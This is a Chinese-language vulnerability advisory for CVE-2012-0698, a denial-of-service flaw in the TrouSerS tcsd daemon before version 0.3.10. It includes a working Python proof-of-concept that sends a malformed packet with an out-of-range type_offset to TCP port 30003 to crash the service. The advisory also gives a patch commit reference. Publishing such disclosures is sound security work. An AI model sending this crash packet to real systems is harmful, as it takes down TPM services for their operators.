TrouSerS tcsd拒绝服务漏洞

发布日期:2012-11-26
更新日期:2012-11-28

受影响系统:
sourceforge trousers < 0.3.10
sourceforge trousers
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2012-0698

Trousers是开源TCG软件栈。tcsd是登录TPM设备驱动程序的唯一入口。

TrouSerS 0.3.10之前版本内的tcsd在实现上存在安全漏洞,通过将带有特制type_offset值的TCP报文发送到端口30003,远程攻击者可利用此漏洞造成拒绝服务。

<*来源:Andy Lutomirski
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# crash_tcsd.py
# Copyright (c) 2012 Andy Lutomirski.  All rights reserved.
#
# Permission is granted to anyone to copy and redistribute this file verbatim.
# Permission is *not* granted to distribute modified copies or derivative works.

import struct
import socket
import time

# UnloadBlob_PCR_EVENT also appears buggy.

crasher = struct.pack('>IIIIIII',
                      28, # packet_size = sizeof(tcsd_packet_hdr)
                      11, # ordinal: LoadKeyByBlob
                      1, # num_parms = 1 (so first getData doesn't bail)
                      0, # type_size = 0
                      0x80000000, # type_offset is off in lala land
                      0, # parm_size = 0 (skip checking)
                      28, # parm_offset: see getTCSDPacket
                      )

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect(('127.0.0.1', 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()

建议:
--------------------------------------------------------------------------------
厂商补丁:

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

?p=trousers/trousers;a=commit;h=ae0c2f8c1fd7a96ba0191f83b6057f8cbc51e786

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wydsjs.html